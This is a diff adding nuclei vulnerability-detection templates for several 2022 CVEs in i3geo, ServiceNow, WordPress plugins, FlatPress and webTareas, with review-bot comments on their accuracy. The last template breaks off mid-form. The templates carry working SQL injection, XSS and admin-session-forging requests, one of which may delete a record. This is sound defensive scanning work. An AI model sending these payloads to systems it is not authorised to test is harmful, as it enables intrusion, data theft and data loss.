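Review bot: The matcher looks for the URL-encoded form `%3Cscript%3E...` in the body, which a page that merely echoes the request URI into a link would also satisfy, so it proves reflection but not unescaped reflection; if the referenced PoC shows the decoded tag landing in the page, matching on `<script>alert(document.domain)</script>` is the stronger signal (hedged — the PoC is not visible here, and the `Invalid consumer key` anchor does at least tie the hit to this page). `metadata` is missing `max-request: 1`, which the sibling templates carry.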
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2022-34094
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
|
||||||
|
reference:
|
||||||
|
- https://github.com/edmarmoretti/i3geo/issues/5
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-34094
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,i3geo,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
||||||
|
condition: and
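Review bot: The second reference points at the wrong advisory: `https://nvd.nist.gov/vuln/detail/CVE-2022-34093` belongs to the sibling access_token.php template, while this file is `CVE-2022-34094`; change it to `https://nvd.nist.gov/vuln/detail/CVE-2022-34094`. As in the sibling, the matcher accepts the URL-encoded payload, which shows the input is echoed but not that it is unescaped; if the page reflects the decoded tag, matching on `<script>alert(document.domain)</script>` would be stronger. `metadata` lacks `max-request: 1`.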
|
|
@ -0,0 +1,68 @@
|
||||||
|
id: CVE-2022-39048
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ServiceNow - Cross-site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
|
||||||
|
reference:
|
||||||
|
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
|
||||||
|
- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-39048
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-39048
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"ServiceNow"
|
||||||
|
tags: cve,cve2022,xss,servicenow,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /navpage.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /login.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
|
||||||
|
- 'assessment_list.do'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
|
||||||
|
internal: true
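Review bot: The `type: status` matcher carries `part: header_3`, which a status matcher does not consume, so the attribute is misleading (hedged, per my understanding of nuclei's matcher semantics); the tidy form is a dsl clause, `- 'status_code_3 == 200'`, next to `contains(content_type_3, "text/html")`. The csrf extractor has `part: body` with no index, so it runs against every response; `part: body_1` pins it to the navpage.do fetch that actually carries `sysparm_ck` (hedged on extractor indexing). The template posts real credentials to `/login.do`; a comment above `http:`, `# requires -V username=... -V password=...`, tells operators what the `authenticated` tag implies.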
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2022-40032
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Simple Task Managing System v1.0 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51273
|
||||||
|
- https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40032
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-40032
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,simple-task,stms,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
POST /task/loginValidation.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=7'
|
||||||
|
- 'status_code == 302'
|
||||||
|
- 'content_length == 0'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
condition: and
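Review bot: The description is generic SQL-injection boilerplate and never says what the template tests; from the request it should read something like `Simple Task Managing System v1.0 does not sanitise the login parameter of /task/loginValidation.php before using it in a SQL query, allowing unauthenticated time-based SQL injection.` The payload is an sqlmap-style conditional that sleeps `7-IF(ORD(MID(schema_name,12,1))>48,0,1)` seconds, so whether `duration>=7` is met depends on the target's first schema name rather than on the injection itself; a plain `login=test'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20-&password=` sleeps deterministically and leaks nothing. For consistency with the Cryptocurrency Widgets template, `len(body) == 0` reads the same as `content_length == 0` and does not depend on the header being present.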
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2022-40047
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Flatpress < v1.2.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
|
||||||
|
- https://github.com/flatpressblog/flatpress/issues/153
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"flatpress"
|
||||||
|
tags: cve,cve2022,flatpress,authenticated,xss
|
||||||
|
|
||||||
|
variables:
|
||||||
|
randstring: "{{to_lower(rand_base(16))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
|
||||||
|
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="user"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="pass"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
------WebKitFormBoundary{{randstring}}
|
||||||
|
Content-Disposition: form-data; name="submit"
|
||||||
|
|
||||||
|
Login
|
||||||
|
------WebKitFormBoundary{{randstring}}--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "flatpress")'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "onfocus=\"alert(document.domain)")'
|
||||||
|
condition: and
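Review bot: The title `Flatpress < v1.2.1` contradicts the description, which says `Flatpress v1.2.1 was discovered to contain` the issue; one of the two is wrong and the GitHub issue should settle which (hedged — it is not visible here), e.g. `name: FlatPress 1.2.1 - Cross Site Scripting`. The template has no `classification` block at all (no cvss-metrics, cvss-score, cwe-id, cve-id) unlike every sibling; at minimum `cwe-id: CWE-79` and `cve-id: CVE-2022-40047` follow from the id and the payload. A comment above `http:`, `# requires -V username=... -V password=...`, would make the `authenticated` tag actionable.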
|
|
@ -0,0 +1,58 @@
|
||||||
|
id: CVE-2022-4049
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP User <= 7.0 - Unauthenticated SQLi
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
|
||||||
|
- https://wordpress.org/plugins/wp-user/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4049
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4049
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET {{path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)
|
||||||
|
|
||||||
|
attack: clusterbomb
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- "/index.php/user/"
|
||||||
|
- "/user"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'Invalid Access')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
|
||||||
|
internal: true
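Review bot: `attack: clusterbomb` with a single payload set (`path`) is really a batteringram sweep; `attack: batteringram` states the intent and avoids cross-product semantics if a second set is ever added. `verified: "true"` is a quoted string where every sibling uses the boolean `verified: true`, and `metadata` lacks `max-request: 4` (two paths × two requests). In the matcher the unsuffixed `duration>=6` and `status_code == 200` refer to the last response while the other clauses are explicitly `_2`; `duration_2>=6` and `status_code_2 == 200` keep it uniform, and since this is an unauthenticated time-based check a baseline such as `duration_1<6` would cut false positives on slow hosts.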
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2022-4059
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
|
||||||
|
remediation: Fixed in version 2.0
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4059
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4059
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/"
|
||||||
|
tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_1>=7'
|
||||||
|
- 'len(body_1) == 0'
|
||||||
|
- 'status_code_1 == 302'
|
||||||
|
- 'contains(body_2, "Cryptocurrency Widgets Pack")'
|
||||||
|
condition: and
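Review bot: `max-request: 1` is wrong — the template sends two raw requests (the admin-ajax SQLi and the readme.txt fetch), so it should be `max-request: 2`. Since the readme fetch is the cheap fingerprint, sending it first would mean the 7-second SLEEP payload is only interesting on hosts that actually run the plugin; with the order swapped the matcher becomes `duration_2>=7`, `len(body_2) == 0`, `status_code_2 == 302`, `contains(body_1, "Cryptocurrency Widgets Pack")` (hedged: nuclei raw requests run sequentially without a conditional stop, so this is a noise/cost point rather than a correctness one).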
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2022-4305
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Login as User or Customer < 3.3 - Privilege Escalation
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
|
||||||
|
remediation: Fixed in version 3.3
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4305
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4305
|
||||||
|
cwe-id: CWE-269
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/login-as-customer-or-user"
|
||||||
|
tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: loginas_old_user_id=1
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html") && contains(content_type, "Dashboard")'
|
||||||
|
condition: and
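Review bot: The second dsl clause can never be true: `contains(content_type, "text/html") && contains(content_type, "Dashboard")` looks for the word Dashboard inside the Content-Type header, so the template will not match even on a vulnerable install; it should be two clauses, `- 'contains(content_type, "text/html")'` and `- 'contains(body, "Dashboard")'`, under the existing `condition: and`. If `loginas_return_admin` answers with a redirect into wp-admin after switching the session, `host-redirects: true` and `max-redirects: 2` are also needed for the body to contain the dashboard at all (hedged — the plugin's response is not visible here).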
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: CVE-2022-44290
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/2
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44290
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-44290
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "text/html")
|
||||||
|
- contains(body, 'Delete the following?')
|
||||||
|
condition: and
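Review bot: The matcher uses unsuffixed `duration`, `status_code`, `header` and `body`, which resolve to the last response, while the sibling CVE-2022-44291 template spells out `duration_2` / `body_2` and additionally checks `body_1` for `webTareasSID` to confirm the login succeeded; aligning this one (`duration_2>=6`, `status_code_2 == 200`, `contains(body_1, "webTareasSID")`) keeps the pair maintainable and stops a failed login from being scored on timing alone. The `Delete the following?` string suggests the GET only renders a confirmation page, but the request does target a delete handler with `id=1)`, so it is worth confirming in the application source that nothing is removed on GET before pointing this at production. The static multipart boundary works, but `{{randstr}}` as the Flatpress template uses avoids a fixed fingerprint.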
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: CVE-2022-44291
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44291
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-44291
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=6'
|
||||||
|
- 'len(body_2) == 0'
|
||||||
|
- 'status_code_2 == 302'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_1, "webTareasSID")'
|
||||||
|
condition: and
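Review bot: This request hits `phasesets.php?mode=delete&id=1)` and the matcher expects a `302` with an empty body — i.e. the delete action completing rather than a confirmation page — so on a vulnerable target the injected predicate `... AND (6162=6162` is true and phase set 1 may really be deleted by the scan. A detection payload should keep the SLEEP but make the row predicate false, e.g. `id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6163`, and the description should state that the endpoint is a delete handler (hedged: whether MySQL still evaluates the SLEEP subquery once the trailing comparison is false depends on evaluation order, so verify on a test instance). `metadata` also lacks `max-request: 2`, which the sibling 44290 template has.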
|
|
@ -0,0 +1,166 @@
|
||||||
|
id: CVE-2022-44957
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - Cross-Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/11
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44957
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2022-44957
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,xss,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /clients/editclient.php? HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /clients/editclient.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="csrfToken"
|
||||||
|
|
||||||
|
{{csrf}}
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
add
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cown"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cn"
|
||||||
|
|
||||||
|
{{randstr}}<details/open/ontoggle=alert(document.domain)>
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="add"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="zip"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="ct"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cou"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="wp"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="fa"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="url"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="curr"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="wc"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="pym"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="pyt"
|
||||||
|
|
||||||
|
7
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="c"
|
||||||
|
|
||||||
|
